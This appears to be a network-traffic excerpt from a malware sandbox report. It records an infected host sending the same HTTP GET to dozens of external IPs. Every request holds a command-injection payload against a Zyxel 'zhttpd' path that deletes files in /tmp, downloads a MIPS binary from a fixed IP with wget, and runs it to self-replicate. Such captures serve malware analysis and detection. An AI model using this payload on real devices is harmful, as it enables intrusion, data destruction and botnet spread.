                                        Mar 31, 2024 09:20:43.391493082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2042192.168.2.2335640207.152.81.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391521931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2043192.168.2.2340668101.146.224.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391572952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2044192.168.2.2343408129.205.235.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391613007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2045192.168.2.235922698.208.141.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391654968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2046192.168.2.2340188128.72.9.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391693115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2047192.168.2.2351126216.219.83.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391721964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2048192.168.2.2339916169.156.133.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391772985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2049192.168.2.235141053.231.178.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391810894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2050192.168.2.2342030174.233.136.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391863108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2051192.168.2.233428259.116.116.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391916037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2052192.168.2.2349140106.88.8.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.391963005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2053192.168.2.2347274171.11.47.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392021894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2054192.168.2.2344234136.67.207.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392050982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2055192.168.2.234816035.169.52.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392096043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2056192.168.2.2357492132.1.103.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392131090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2057192.168.2.2343690183.7.31.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392183065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2058192.168.2.234750671.7.144.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392222881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2059192.168.2.233917052.245.182.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392267942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2060192.168.2.2356786137.242.201.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392313004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2061192.168.2.2335820187.226.21.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392359972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2062192.168.2.2345706175.147.6.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392399073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2063192.168.2.235337871.160.44.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392460108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2064192.168.2.235904242.168.253.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392491102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2065192.168.2.234934217.241.240.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392544985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2066192.168.2.2358410140.131.157.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.392575026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2067192.168.2.2352376160.47.134.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399457932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2068192.168.2.2339772156.138.88.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399491072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2069192.168.2.2342210185.22.235.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399563074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2070192.168.2.2341478160.254.249.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399594069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2071192.168.2.233305081.25.57.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399651051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2072192.168.2.235919278.99.163.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399693966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2073192.168.2.2337034157.143.205.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399746895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2074192.168.2.2343462222.93.118.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399771929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2075192.168.2.235449274.202.133.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399847984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2076192.168.2.233703631.58.37.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399880886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2077192.168.2.2332822206.13.192.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399915934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2078192.168.2.2346482142.147.180.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399965048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2079192.168.2.2337994143.94.167.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.399998903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2080192.168.2.2355296103.147.64.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.400042057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2081192.168.2.2333494187.47.217.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.400060892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2082192.168.2.233870439.59.247.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.400101900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2083192.168.2.234784666.34.28.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.400147915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2084192.168.2.2338162184.146.203.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.400187016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2085192.168.2.234237457.176.83.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.400240898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2086192.168.2.23450161.209.64.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.400291920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2087192.168.2.2350356180.239.220.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:44.403695107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2088192.168.2.234994076.89.21.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:44.403791904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2089192.168.2.233454076.160.32.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:44.403830051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2090192.168.2.233823854.33.0.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:44.405814886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2091192.168.2.2350284192.237.118.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:44.405879021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2092192.168.2.2357302195.121.144.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:44.405937910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2093192.168.2.2348848126.182.231.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.418999910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2094192.168.2.2339162112.62.34.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419085026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2095192.168.2.2333892179.69.156.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419187069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2096192.168.2.2355148167.66.29.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419260979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2097192.168.2.2335338131.197.69.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419352055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2098192.168.2.235184094.27.201.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419423103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2099192.168.2.235509440.70.122.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419467926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2100192.168.2.235921677.241.60.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419575930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2101192.168.2.2354956136.6.165.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419641972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2102192.168.2.2358472166.111.20.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419698954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2103192.168.2.235024854.161.83.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419764996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2104192.168.2.2353302135.64.54.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419866085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2105192.168.2.2336618198.229.3.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.419949055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2106192.168.2.234900831.161.70.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.420011044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2107192.168.2.2350684164.215.116.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.420077085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2108192.168.2.2340158205.39.205.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.420128107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2109192.168.2.2355192101.0.231.146443
                                        TimestampBytes transferredDirectionData
